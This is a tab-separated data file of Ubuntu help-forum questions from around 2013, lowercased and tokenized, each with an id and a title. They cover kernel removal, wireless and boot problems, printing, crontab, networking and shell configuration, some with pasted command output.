385142	unable to remove kernel version 3.2.0-52 , 3.2.0-23 in ubuntu 13.10	i upgraded my ubuntu 12.04 system to 13.10 using a bootable usb . after upgrading i tried to remove old version kernels that appeared in grub boot menu , using the synaptic package manager . but old kernel packages ( example : linux-image 3.2.0-52-generic , 3.2.0-23-generic ) do not appear in synaptic . when i try to update grub , i see the kernels there . how can i remove them properly ? tried everything : command line , synaptic , ubuntu tweak but it does not display . but during boot it always shows up . how to remove these kernel versions from old release ? dpkg -l | grep linux-image ii linux-image-3.11.0-14-generic 3.11.0-14.21 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp ii linux-image-extra-3.11.0-14-generic 3.11.0-14.21 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp ii linux-image-generic 3.11.0.14.15 i386 generic linux kernel image ls /boot | grep vmlinuz vmlinuz-3.11.0-14-generic vmlinuz-3.2.0-23-generic-pae vmlinuz-3.2.0-52-generic-pae cat /boot/grub/grub.cfg | grep menuentry | cut -c -80 if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' menuentry_id_option= '' '' export menuentry_id_option menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menu submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-4f menuentry 'ubuntu , with linux 3.11.0-14-generic ' -- class ubuntu -- class gnu-lin menuentry 'ubuntu , with linux 3.11.0-14-generic ( recovery mode ) ' -- class ubuntu menuentry 'ubuntu , with linux 3.2.0-52-generic-pae ' -- class ubuntu -- class gnu- menuentry 'ubuntu , with linux 3.2.0-52-generic-pae ( recovery mode ) ' -- class ubu menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu- menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ( recovery mode ) ' -- class ubu menuentry 'memory test ( memtest86+ ) ' { menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { menuentry 'windows 7 ( loader ) ( on /dev/sda3 ) ' -- class windows -- class os $ menuen
385143	another problem with connecting to wireless	help ! i 've just installed 12.10 and can not connect to my wireless connection . the system keeps asking to log in , keeps checking , but ca n't seem to connect . i know there are many threads on this topic , but my head is spinning trying to figure things out . thanks anyone ! okay , tried the additional drivers command , but it did n't find anything . here is what i get from lspci ... 02:02.0 network controller : intel corporation pro/wireless lan 2100 3b mini pci adapter ( rev 04 ) ( sorry if it 's not formatted correctly -- still learning the ropes . ) so seems like intel network card . let me see what 's out there for download -- but any advice you have is much appreciated ! thanks so far !
385144	ca n't boot ubuntu 13.10 with opencv	i 'm developing a c++ project on ubuntu 13.10 . to compile this project i need opencv and armadillo libraries . after the opencv installation ( ver . 2.4.6 ) ubuntu does n't run . during the boot appears a frozed-black screen with the x-shaped mouse pointer . how can i resolve this problem ? the same thing happens with wubi ( ubuntu 13.10 on windows ) , does n't work after opencv installation . thanks
385145	how do i bind a key to a command on the lock screen ?	i want to bind a key when the lock screen is up ( or the screensaver is on ) . my machine is often locked and i want to be able to hit a shortcut to run a script in my home directory . i 've used system settings - > keyboard - > shortcuts to bind keys to trigger the lock screen , but when the screensaver is on or the lock screen is up , my custom shortcut is disabled . is there a way to flag my custom shortcut so that it is available from the lock screen , or to set it in gnome-screensaver ?
385147	prevent formatting /var partition when installing ubuntu	lately i wanted to make a fresh install of ubuntu 13.10 as i had bad experience with do-release-upgrade command . when i chose the option of manual partitioning i discovered that even if i chose not to format the /var partition it will be formatted . this is quite a problem as i made a separate partition for /var because in /var/mysql i have a lot of databases , users and if in the past i made a new install i did not lose anything from my mysql folder . so the question is : how to install ubuntu 13.10 but prevent the install from formatting my /var partition ?
385149	how to disable boot selection	i have ubuntu server running inside a virtual machine that starts after windows starts , then it runs in the background ( using virtualbox headless ) . the machine is supposed to run as a server in the background . it has apache installed on it which starts after ubuntu boots . i connect to the server through ssh . sometime the vm is not properly shutdown , for example when windows crashes , and next time i start the vm i may get the stupid boot loader screen which basically makes the server unusable because it waits for user input before starting apache ( why would the ubuntu devs enable this in ubuntu server ? ! ) . is there any way to disable it ? i do n't like opening virtulbox every time ubuntu is stuck at the boot loader . i just want it to boot the default option ( ubuntu ) , regardless of the previous shutdown mode .
385150	how to install changes to /etc/crontab	if i want to add lines to my system 's /etc/crontab , what do i have to do to get them to take effect ? background : i 'm trying to set up a machine with ubuntu 13.04 so that it automatically locks/unlocks the monitor during the workday ( it 's hanging on the wall ) . i 've done this by adding the following to my /etc/crontab : 00 18 * * mon-fri myuser export display : =0 & & gnome-screensaver-command -a 00 18 * * mon-fri myuser export display : =0 & & xset dpms force standby 00 08 * * mon-fri myuser export display : =0 & & gnome-screensaver-command -d 00 08 * * mon-fri myuser export display : =0 & & xset dpms force on the individual commands work fine , but i 'm trying to test the crontab entries by setting the minute/day to the upcoming minute . for example , at 1:26pm i set the first two columns to 27 13 and waited until the next minute rolled around . but the commands do n't appear to be getting executed . i also tried running sudo crontab /etc/crontab , but it does n't seem to help .
385153	network bridging and routing	i have a isp . and i have ubuntu server 12.4 with three nic . here eth0 ip is 10.10.10.15 with the gateway 10.10.10.1 , eth1 ip is 10.0.0.20 with the gateway 10.0.0.1 and last eth2 my local lan ip 192.168.20.1. i want to bridge eth0 and eth1 bandwidth for eth2 . here eth0 have 1mbps from external isp and eth1 have 512 mbps from external isp . i mean in eth2 i want a gateway with the bw 1500mbps . i saw some example with bridge utils but i dont understand about gateway of br0 , imean like : auto eth2 iface eth2 inet static address 192.168.20.1 netmask 255.255.255.0 network 192.168.20.0 broadcast 192.168.20.255 gateway ? bridge_ports eth0 eth1 i need full bw ( 1000mbps+512mbps ) into one mean ( eth0+eth1 ) - > to eth2 ( 1500mbps ) what will my eth2 gateway and how to load balance the bw please help
385154	mutt notify on finish sending	i 'm looking for a way in .muttrc to tell it to invoke notify-send when it 's done sending an email . i use mutt inside a guake window . so when i hit y to send i immediately hit f12 to close the terminal and get back to work . i need a way for mutt to invoke notify-send after it 's done sending so i know it 's done sending .
385155	how to uninstall kvm	i need to completely remove kvm from my ubuntu desktop , but even after removing the kvm packages , when i run the following command : virsh -c qemu : ///system list it shows : id name state -- -- -- -- -- -- -- -- -- -- -- -- - this indicates that kvm is still running . how do i completely uninstall kvm from my system ?
385156	server gui , problem after installation	i 've recently acquired a small dedicated server from `` x '' company . i 'm using it for small tasks such as torrenting , ftp , minecraft , etc . so , i 'm trying to install a gui for my server to browse the web at work ( we have a lot of restriction on websites : ( ) i read a couple of tutorials , but they all assume i have the server plugged-in right front of me . i have ubuntu server 13.10 installed , i created a new user , lets say , called anon . then , i installed the desktop via $ apt-get install ubuntu-desktop & & cinnamon after that , i installed vnc4server to log remotely into the machine ; but all i get is a terminal in the vnc viewer . from there , i assume i have to modify a config file to boot into my desktop enviroment . i tried modifying the .vnc/xstartup in my /home directory but i 'm still getting my same old terminal window . but now with a cinnamon error : ( ( i just added exec cinnamon-session to the file ) what i want , is to be able to log in to the server with a vnc viewer and be able to log-out/login as wished to enter different user-sessions etc . i 'm getting comfortable with the command line , but i would also like to have that alternative to browse the web and other stuff . thank you for reading , and i tried my best for the grammar ( english is my second language ! )
385157	implementation of keyboard shortcuts for accessibility	lots of people with poor hand dexterity use keyboard shortcuts when the mouse or any pointing device is not suitable for their ( dis ) ability . for example , i can mouse to change the volume control maybe in 5 to 10 seconds depending on my state of control in at the time . or in 95 % of the time i can hit keyboard shortcut right way . since 12.04 i 've been mapping alt+ ' , alt+ , to the sound and media 's mute , volume down , and volume up under the system settings > keyboard shortcuts . it worked as long as i did n't reboot or log out , where it just did n't seem to read the set values in again . now in 13.04 it looks like the system just forget them after a few minutes . how do i fix this , as well as the losing of keyboard shortcuts on log out , and is there any good user document on keyboard mapping ?
385158	how to create a plymouth bootsplash with changing backgroud colours	i want to create a new bootsplash screen for ubuntu that has 2 logos ( a text saying `` ubuntu '' + `` starting ubuntu ... '' / `` shutting down '' ) , changing background colours during boot ( like on windows 8 ) and only one colour at shutdown . i have made a copy for testing here that loads windows 8 pngs , but the colours seem to load too fast . can make plymouth load many colours without using background pngs ?
385159	ubuntu 13.10 installer/live fails to boot from dvd/usb on uefi	i have a brand new toshiba satellite s50-a that came loaded with windows 8.1 . i would like to live boot ubuntu from a usb drive , or failing that , a dvd . ( i do not want to install ubuntu on this machine ) . whenever i attempt to boot the install/live ubuntu 13.10 from either a usb drive or a dvd , it loads the grub boot menu , but selecting any option results in the same results : the screen goes blank , the usb or dvd drive blinks a couple of times then goes dark , and nothing else happens . booting will work if the setup utility is configured for `` csm boot '' , but this mode fails to boot the windows 8.1 install . i have read dozens of threads about this and similar issues , but none of those seem to apply exactly to my experience . i have tried a number of suggestions from those threads , without success : computer setup utility is at latest available version secure boot can be either on or off , with no effect fast boot is disabled windows 8 fast startup is disabled computer setup has no `` intel speed step '' setting i have verified that the computer is booting the dvd/usb in uefi mode , as per https : //help.ubuntu.com/community/uefi # identifying_if_the_computer_boots_the_ubuntu_dvd_in_efi_mode computer setup has only two boot modes , `` uefi boot '' and `` csm boot '' , which apply to all drives . setting boot mode to `` csm boot '' allows successful boot of ubuntu 13.10 from both usb and dvd . however , the computer then fails to boot windows 8.1 , so this is not an acceptable solution . it is not possible to configure uefi/csm per drive . i have tried standard dvd from iso , usb from iso using unetbootin , and usb from iso using dd . all fail to boot in uefi mode in the same way . update : i have tried the following kernel options without effect : nomodeset , acpi=0 , acpi_osi=linux , acpi_backlight=vendor , noalpic , i915.i915_enable_rc6=1 , video=1280x1024-24 @ 60 , video=vga-1:1280x1024-24 @ 60 update 2 : i do n't know if this will provide any useful information : when i boot to usb , i reach the grub menu . if i press 'c ' for command line , then manually input the lines that are present in the grub.cfg file for `` try ubuntu without installing '' ... set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz ... then all three of these command succeed . but when i issue the boot command , the light on my usb drive immediately turns off , with no further output to the screen . partial resolution : as per oldfred 's suggestion , disabling the integrated nic allowed the computer to boot from usb in uefi mode . of course , the ethernet adapter is now completely disabled , so it is not exactly a proper solution , but it 's a step in the right direction ! this does not seem to be strictly a driver issue . disabling the appropriate kernel driver module via grub command line ( by appending modprobe.blacklist=alx , which i have previously verified as successfully disabling the ethernet driver ) does not result in a successful boot if the lan port is enabled in the computer setup . something else must be going on . again , i do not wish to install ubuntu to this machine ; only boot from usb/dvd . and configuring the laptop in `` cms boot '' mode does work for both usb and dvd , but it is not an option as it renders windows 8.1 unbootable . any other suggestions are appreciated .
385161	ca n't adjust the brightness on ubuntu 13.10	i 've got a new laptop ( lenovo thinkpad e145 ) and i ca n't adjust the brightness . when i press the brightness adjustment keyboards , i can see the window that appears top right corner which is showing that it is changing the brightness , but nothing happens . i ca n't adjust the brightness in settings either . i have tried some solutions suggesting editing the grub file , but they did n't work for me . thank you
385168	revert to cups 1.6	the latest version of cups ( 1.7 ) has been causing me some serious headaches lately , such as thinking that i am trying to print 600 pages instead of 3 . does anyone have an idea how to revert to version 1.6 ? ( ubuntu 13.10 )
385174	error trying to install on boot	i put ubuntu 64 on a external hard drive using universal usb installer . when i try booting it , i get the purple screen like it 's going to work , but then i get a black screen with the message [ 1.0346701 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) . i have tried re-downloading ubuntu and using uui to put it back on the external hd , but still got the same screen . i have also tried it on 2 separate computers .
385177	can i sync a subversion ( svn ) repository with ubuntu one ?	there are many successful reports on the internets about putting your svn repository in a dropbox folder as a simple way to share access to the repository between different devices . it comes with some caveats and possibility for conflicts , but in simple use cases , such as sharing a single repository between two computers ( and for a single user ) , it seems to work fine . now to my question . would i be able to sync my svn repository with ubuntu one without any issues ? consider a simple scenario : one user , checkout and commit to/from two different computers and i would obviously never commit from both computers at the same time . a significant difference between dropbox and ubuntu one is that ubuntu one does not sync file meta data ( such as file permissions and time stamps ) . would this make it any less desirable to sync an svn repository with ubuntu one over dropbox ?
385181	mathematica 9 error on ubuntu 12.04	after installing mathematica 9 on ubuntu 12.04 , generates following error : traceback ( most recent call last ) : file `` /usr/bin/test '' , line 8 , in < module > call ( [ command , parameter ] ) file `` /usr/lib/python2.7/subprocess.py '' , line 493 , in call return popen ( *popenargs , **kwargs ) .wait ( ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception oserror : [ errno 8 ] exec format error mathematica front end executable /usr/local/bin/systemfiles/frontend/binaries/linux-x86-64/mathematica not found . your mathematica installation may be incomplete or corrupted . mathematica front end executable /usr/local/bin/systemfiles/frontend/binaries/linux/mathematica not found . your mathematica installation may be incomplete or corrupted . i have tried reinstalling mathematica many times , i get same error as above . any hints ?
385182	`` sdc : assuming drive cache : write through	i am creating the vm for installing my software on that while media disks are configured , the disk partitioning process causes a printout to the installation screen : `` sdc : assuming drive cache : write through how can i suppress this printout on screen
385184	running cdebconf-newt-detect-keys in an installed system	is there a way to run cdebconf-newt-detect-keys in an installed system ? i want to know my new keyboard layout . some keys are n't working .
385185	where do find ibm t42 type 2378 ip address ?	i have an ibm t42 type 2378 fzu . when i was installing ubuntu non-pae , the network auto configuration dhcp protocol failed . i did n't know my ip address ? how do i find it ? thanks .
385186	file copy operation hangs on kubuntu 12.04	i have an ntfs partition on my hard drive to store movies etc . whenever i try to copy files ( specifically large files i guess ) into the ntfs partition copying operation hangs and copying speed is shown as `` 0 '' . same error occurs when copying to my usb harddisk . i can not copy the movies i downloaded to my hard drives . is it a known bug or something ? and of course , how can i fix that ?
385188	a script that signals if a login attempt is failed	i want to run a script that signals if a login attempt is failed.my problem is how do i get the text from the user textbox and from the password textbox.i would be very thankful if somebody will help me.i also forget that i am a newbie : )
385189	what do i need to do to get cups working ?	how do i make cups work ? when i go to cups admin , it asks for a username and password . root password . reset root password . create new root user . things i have tried my login su sudo root ( as username ) what in the world is required to set up new printer ?
385191	move postgresql temporary file location	how do i move the postgresql temporary file / cache location ? i have limited space on my system partition so it keeps throwing me errors like this one : error : could not extend file `` base/16384/16563.1 '' : wrote only 4096 of 8192 bytes at block 207279 sql state : 53100 hint : check free disk space .
385193	where can i find `` mkisofs '' and `` cdrecord '' for ubuntu 12.04 ( e.g. , iso9660 ufs )	where can i find `` mkisofs '' and `` cdrecord '' for ubuntu 12.04 ( e.g. , iso9660 hfs ) ?
385198	xubuntu not shutting down	i 've installed the xubuntu-desktop package onto my ubuntu 13.10 install . i like the look and the feel of the xubuntu desktop however , i 'm running into several issues : shutting down / logging out is n't consistent ; sometimes it shuts down right away , other times it delays for a good amount of time ( around 60 seconds ) before shutting down ( or logging out ) . the power manager does n't recognize the battery ( again , this does n't happen everytime , it just happens sometimes ) ; trying to open the power manager ends up in nothing happening . is there any reason why this is happening ? i 've still got my unity desktop installed , is that what 's causing the conflicts ? i really like how my install is setup right now , and i 'd hate to change it . i should note that everything functions perfectly in unity . ( shut down , logging on/off etc.. ) edit : forgot to mention that i get an error message when i press `` shutdown '' again ( during the long delay ) session manager must be in idle state when requesting a shutdown
385199	just installed ubuntu , what to do after reboot ?	ok so i 've been trying all day to install ubuntu and finally succeeded , sort of . you see , when it tells me to reboot/reset my computer after installation , i do so , and upon startup , i get a screen asking me to choose from the following : default , help , try ubuntu without installing , install ubuntu , and then some other options/ something about my hard drive . i do n't really remember , i 've only seen it a few times , and i 'm not exactly a computer geek ( no offense . ) when i tried any option other than 'install ubuntu ' it either asks me to enter something in code ( idk any code/how it works ) or it gets stuck on that white blinky type-y thingy at the top left corner , i do n't know how to explain it . so if anyone could please help me ? if you can even understand anything i just said , i 'm not even sure if i do .
385201	difference between fuse and vfs in linux ?	what is the difference between vfs [ virtual file system ] and fuse [ file system in user space ] in linux . i think , most of the popular os today support vfs feature . i recently had a chance to go through fuse wiki on source forge and i assumed fuse would provide as api for implementing wrapper functions for file operations while the actual file operations are done by low-level file system that resides in the kernel . is n't this what vfs does ? what is the boundary between vfs and fuse ? can i imagine this as - fuse on top of vfs on top of actual kernel file system ? any pointers in this direction would be really helpful . thanks for looking at this , and for your time .
385202	running off disc , ca n't format internal hd	i have 12.04 on a disc , in an external drive connected by usb running , and using disc utility i get this message when trying to format the drive : '' details error creating partition table : helper exited with exit code 1 : in part_create_partition_table : device_file=/dev/sda , scheme=3 ped_device_get ( ) failed '' any advice ? the drive is a 40gb wd but it 's reading on disc utility as having 0.0 kb
385203	why does minecraft run so slow ?	i played minecraft on this computer until it was updated to 13.04 , now i get 1-5 frames per second . these are my specs . memory:3.9 gib processor : pentium ( r ) dual-core cpu e5500 @ 2.80ghz ă 2 graphics ( before update said it was intel ) : gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) os type:32-bit disk:485.9 gb
385209	problems booting xubuntu on a usb drive	i 'm having problems booting xubuntu on an asrock uefi motherboard i have an following hardware i 'm trying to setup with xubuntu 12.04.3 : amd processor asrock 970 extreme 4 am3+ motherboard 16gb patriot mini usb drive my steps to install a bootable and persisted xubuntu usb drive follows : on my mac create a liveusb from my mac to 4gb sandisk usb using unetbootin as the installer format the 16gb patriot usb drive on my mac to fat32/mbr installation process plug both usbs to the motherboard change bios to boot usb drives ( first = 16gb patriot persisted drive ; second = 4gb sandisk liveusb ) press f11 and selected to boot 4gb sandisk liveusb selected and installed xubuntu on 15gb patriot drive once it finished doing this install ; i restarted and got the following : can not find operating system a tried to force boot the persisted drive ( on the motherboard you can either select usb : patriot or uefi : patriot i ran boot-repair and thought it solved the problem . but when i shutdown or restart xbunutu and goes to either ' can not find os ' or 'efidsk error ' or the 'grub minimal screen' the only way i can get xbunutu to boot is to press f11 and select 'uefi : patriot ' on the boot loader . but sometimes , i have to restart multiple times and press f11 and select 'uefi : patriot ' before it will load the grub menu . to solve this problem , i 'd like to know what 's happening and if i can get xubuntu to load without problems and directly to the os ( without seeing the grub menu ) sorry for the long question . looking forward to learning and appreciate any insights . thanks in advance : ) wd
385212	ubuntu & remmina different behaviour on internet access type	using ubuntu & remmina i ca n't connect to my remote computers when i connect to internet using a mobile broadband connection . in windows 7 : i connect to vpn using cisco vpn , then i use a rdp to control my remote computer . i can connect using wifi ( router ) or mobile broadband connection . no problem at all . in ubuntu : i connect to vpn , then i use remmina to control my remote computer . i can connect using wifi ( router ) with no problem ( vpn and remmina works fine ) but when i try to connect using phone i can connect to vpn but remmina does not works ( unable to connect ) . seems that the problem is not the mobile broadband connection due to i can connect in windows 7 . seems that the problem is remmina . some clues to resolve this ? thanks .
385213	should i install any drivers after ubuntu installation like sound driver , landriver	i am new to this should i install any drivers in it so it can be functionally active and what extension it uses for softwares
385214	guitar fx program ?	i am in a sort band , with my friends . we have nothing official , and no money . i am looking into a small computer to put ubuntu on for music during practice sessions and guitar effects , as none of us have the money to put up for a pedal . i am looking for a simple effects program that can use midi inputs , as well as keys on my keyboard to trigger different pedals . i am really set on using keys because i have a `` makey makey , '' which i can use to trigger certain ones . ideally , this would be something free and easy , though i am also always interested in wrapping my mind around a new concept .
385220	how do i save my current os state so i can boot from it ?	hello i am wondering how i can save my current ubuntu 12.04.03 state so i can boot from it on another computer with all my settings and other gizmoâs preloaded ? p.s i am new to ubuntu
385223	problem with bumblebee	when running programs with optirun there is a chance that the following error will occur , and then 30 seconds later the laptop turn off . [ 320.258227 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) server terminated successfully ( 0 ) . closing log file . [ 320.258259 ] [ error ] aborting because fallback start is disabled . what might be the issue ? i am not using any ppas ( xorg-edgers ) that touch the nvidia driver nor bumblebee/primus in any way . edit : checking /var/log/kern.log for nvrm shows several instances of this : dec 2 20:35:05 naren-cn15 kernel : [ 320.207432 ] nvrm : gpu at 0000:01:00.0 has fallen off the bus .
385226	how do i report a translation error ?	i 'm new to ubuntu , and so far , i like it , but there seems to be one translation typo in my native languages ' week names , where sunday is written like 'sabaat ' when it was supposed to written like this 'sapaat ' . i know it may not be much for you , but i want to have it fixed , but i do n't know how or where to report it . help !
385228	restart nautils failed	here is the error log . sudo nautilus -q [ sudo ] password for yhjhoo : ( nautilus:28849 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files initializing nautilus-open-terminal extension initializing nautilus-dropbox 1.4.0 traceback ( most recent call last ) : file '' /usr/share/nautilus-python/extensions/rabbitvcs_bak.py '' , line 67 , in < module > from rabbitvcs.vcs import vcs file `` /usr/lib/python2.7/dist-packages/rabbitvcs/vcs/__init__.py '' , line 27 , in < module > from rabbitvcs.util.log import log file `` /usr/lib/python2.7/dist-packages/rabbitvcs/util/__init__.py '' , line 23 , in < module > from rabbitvcs.util.log import log file `` /usr/lib/python2.7/dist-packages/rabbitvcs/util/log.py '' , line 48 , in < module > from rabbitvcs.util.settings import settingsmanager , get_home_folder file '' /usr/lib/python2.7/dist-packages/rabbitvcs/util/settings.py '' , line 84 , in < module > settings_spec = find_configspec ( ) file `` /usr/lib/python2.7/dist-packages/rabbitvcs/util/settings.py '' , line 82 , in find_configspec raise ioerror ( `` can not find a configspec.ini file '' ) ioerror : can not find a configspec.ini file ** message : init stock icons sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed
385229	installing ogre with cmake	i am trying to install ogre software with cmake but it says i 'm missing things . i found one and installed it ( freetype ) but i ca n't find ( xaw : x11 athena widget set ) or ( x toolkit ) . is there an easier way to install this ? this is all that i 'm missing now . cmake error at cmakelists.txt:570 ( message ) : x11 support requires xcursor library . after this i am unable to find it to run it . what happened to it ? linking cxx executable ../../bin/ogremeshupgrader [ 100 % ] built target ogremeshupgrader
385230	ubuntu 12.04 lts installation . windows 7 not detected	i am trying to install ubuntu 12.04lts on my new lenovo y510p using live usb method . i know this question has be answered and one of them even had a long answer which was eventually converted to community wiki i guess but all of those answers did not work for me . i have 1 ) 1-2 gb of system 2 ) 200 gb c : with windows ntfs 3 ) 600 gb of data ntfs 4 ) 200 gb of unallocated space for ubuntu however , os-prober doesnt detect windows 7 to give me an option of installing along side.it just gives me an option of wipe out every thing or try something else . here my paste bin from boot-repair utility . can anyone help me with that ? update : here is the screenshot of gparted utility
385231	netbook will not display boot after intstalling 13.04	i just recently installed ubuntu 13.04 ( 32 bit ) on my dell latitude 2120 netbook.the install went fairly smooth and everything seemed to be alright . but now when i boot the computer it does not always boot . what happens is the computer will go through the initial load screen . then it will remain black and nothing else appears . but i know that the computer has loaded and booted normally by watching the led lights , it just will not display anything . there are times where it does boot though . it is random , but it will boot and display it . for this to happen i usually need to go to the grub menu and select `` ubuntu '' , then it runs fine . it also does not matter if i run unity or gnome gui , the problem is the same . please help ! thank you ! -brian
385233	about running ubuntu on a toshiba tecra 8000	hi i have been given a collection of toshiba laptops all minus their hard drive they are tecra 8000 . they are dated , but i like to run dated technology if i can rather than trashing it . i do n't know their specifications like ram , etc . i need an os that will run from their usb or cd drives it would have to be one appropriate to their limited ram and whatever limitations are on this dated machine . well does anyone know the limits of this machine . does anyone know the appropriate kind of operating system that will run on them cd or usb .
385240	volume too low on ubuntu 12.04	i 'm new to ubuntu 12.04 . i used to use win7 and it came built in with a dolby application that gave my laptop large volume without distortion . on ubuntu , i can hardly listen to any youtube video , even when turning max the volume on sound setting . please help , thanks !
385241	12.04 losing internet connection . lan ok. reboot fixes . cause/diagnosis ?	i have several devices on the network . only one with a problem is this ubuntu 12.04 machine . its not a big problem and it is infrequent . so far , i have not noticed a particular cause/event . at some point , i 'll have no internet connection . lan is fine . i can ssh to the machine ( i only have ssh access . its headless ) . it can ping other lan devices but no external devices . all other devices can ping it , and they can also ping external no problem . rebooting fixes ( until the next time ) . its not the firewall ... shut it off = no resolution . i 'm not really sure where to begin with diagnosing . if i ca n't `` fix '' the problem ... i 'd settle for a command that can resolve without rebooting . can i `` refresh '' the internet connection ? oh ... this is a wired connection ( realtek gbe lan chip ) . edit : ok , happened again . here is the output from `` ip route show '' default via 10.1.0.5 dev tun0 proto static 10.1.0.1 via 10.1.0.5 dev tun0 proto static 10.1.0.5 dev tun0 proto kernel scope link src 10.1.0.6 169.254.0.0/16 dev eth0 scope link metric 1000 174.127.121.246 via 192.168.1.1 dev eth0 proto static 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.103 metric 1 edit : output from `` traceroute 8.8.8.8 '' traceroute to 8.8.8.8 ( 8.8.8.8 ) , 30 hops max , 60 byte packets 1 10.1.0.1 ( 10.1.0.1 ) 57.858 ms 57.848 ms 57.850 ms 2 174.127.120.1.static.midphase.com ( 174.127.120.1 ) 57.873 ms 58.141 ms 58.152 ms 3 ge-0-0-12.ar1.ord6.us.nlayer.net ( 69.31.110.85 ) 61.897 ms 61.913 ms 61.917 ms 4 ae5-60g.cr2.ord1.us.nlayer.net ( 69.31.110.253 ) 58.123 ms ae5-60g.cr1.ord1.us.nlayer.net ( 69.31.110.249 ) 58.264 ms 61.899 ms 5 ae1-30g.ar1.ord1.us.nlayer.net ( 69.31.111.134 ) 67.632 ms ae2-30g.ar1.ord1.us.nlayer.net ( 69.31.111.138 ) 67.634 ms 67.586 ms 6 tengige0-0-1-0.gw5.chi13.alter.net ( 63.84.100.185 ) 64.629 ms 56.640 ms 56.632 ms 7 0.xe-11-3-0.gw10.iad8.alter.net ( 152.63.35.237 ) 79.803 ms 80.161 ms 80.118 ms 8 google-gw.customer.alter.net ( 152.179.50.50 ) 81.249 ms 85.203 ms 85.715 ms 9 * 209.85.252.46 ( 209.85.252.46 ) 95.163 ms 209.85.252.80 ( 209.85.252.80 ) 85.975 ms 10 72.14.236.146 ( 72.14.236.146 ) 85.989 ms 86.221 ms 85.982 ms 11 72.14.235.12 ( 72.14.235.12 ) 93.830 ms 66.249.95.229 ( 66.249.95.229 ) 94.196 ms 66.249.95.231 ( 66.249.95.231 ) 93.752 ms 12 72.14.234.53 ( 72.14.234.53 ) 94.114 ms 72.14.234.55 ( 72.14.234.55 ) 90.566 ms 72.14.234.65 ( 72.14.234.65 ) 89.864 ms 13 * * * 14 google-public-dns-a.google.com ( 8.8.8.8 ) 89.826 ms 89.831 ms 90.489 ms
385242	adduser : group sudo does not exist	i am able to login to my account but ca n't do anything related to superuser now . updates , sharing , sudo and all things say authentication failed . i tried to correct that by going in recovery mode and adding my user to sudo but when i use adduser command , i get error message that group sudo does not exist i searched for the error but could not get any link answering this : ( thanks in advance
385243	zsh : command not found : svn_prompt_info	i install the oh-my-zsh through the gist https : //gist.github.com/tsabat/1498393 however , whatever command i typed in the shell , the execute the command then print `` zsh : command not found : svn_prompt_info '' . for example : â ~ ls test.py zsh : command not found : svn_prompt_info my zsh config is as follows . i do n't enable the svn plugin # path to your oh-my-zsh configuration . zsh= $ home/.oh-my-zsh # set name of the theme to load . # look in ~/.oh-my-zsh/themes/ # optionally , if you set this to `` random '' , it 'll load a random theme each # time that oh-my-zsh is loaded . zsh_theme= '' random '' # example aliases # alias zshconfig= '' mate ~/.zshrc '' # alias ohmyzsh= '' mate ~/.oh-my-zsh '' # set to this to use case-sensitive completion # case_sensitive= '' true '' # uncomment this to disable bi-weekly auto-update checks # disable_auto_update= '' true '' # uncomment to change how often before auto-updates occur ? ( in days ) # export update_zsh_days=13 # uncomment following line if you want to disable colors in ls # disable_ls_colors= '' true '' # uncomment following line if you want to disable autosetting terminal title . # disable_auto_title= '' true '' # uncomment following line if you want to disable command autocorrection # disable_correction= '' true '' # uncomment following line if you want red dots to be displayed while waiting for completion # completion_waiting_dots= '' true '' # uncomment following line if you want to disable marking untracked files under # vcs as dirty . this makes repository status check for large repositories much , # much faster . # disable_untracked_files_dirty= '' true '' # which plugins would you like to load ? ( plugins can be found in ~/.oh-my-zsh/plugins/* ) # custom plugins may be added to ~/.oh-my-zsh/custom/plugins/ # example format : plugins= ( rails git textmate ruby lighthouse ) plugins= ( git ) source $ zsh/oh-my-zsh.sh # customize to your needs ... export path= $ path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games
385245	after running update via terminal on ubuntu 13.10 i am getting `` failed to fetch '' error msgs . fixes ?	again , i am using ubuntu 13.10 these are the index files that failed to download : w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how can this be fixed ?
385247	enable to found version for ndiswrapper !	i use ubuntu 12.04 lts i386 . i have a wire internet c. i dont have internet in my computer , and well i only have wifi in my house . i use a little usb wifi adapter ( tp-link ) . i have installed ndiswrapper with my cd instalation and i think that i installed well . the problem is that i cant use it when i open the console and type ndiswrapper it appears a menssage that said unable to found a version for ndiswrapper and i do n't know what to do . what can i do ?
385248	hathway isp - cable modem - connection failure	india has an isp named hathway which provides connection through cable modems . the cable modem is connected through a cat6 cable to the computer . it is surprising that while ms windows is able to connect with the internet and get to the page named login.hathway.com , for accessing the internet , ubuntu fails to even procure the ip as a dsl connection . attempt to connection with dhcp based setting have also failed . i have also tried using sudo pppoeconf and it fails to detect the dsl modem and the connection therein . any clues on this mystery ?
385255	server wont boot ubuntu 13.10	my server stopped booting . i have posted boot repair info at http : //paste.ubuntu.com/6512320/ i just moved from windows and have no idea whats wrong .
385256	replaced windows 8 with ubuntu . all partitions deleted	i installed ubuntu using live cd by selecting replace windows 8 with ubuntu . i want to get my data back.my windows partition details : c : 40gb d : 110gb c : 160gb e : 130gb so shall i reinstall windows 8 and run some recovery software ?
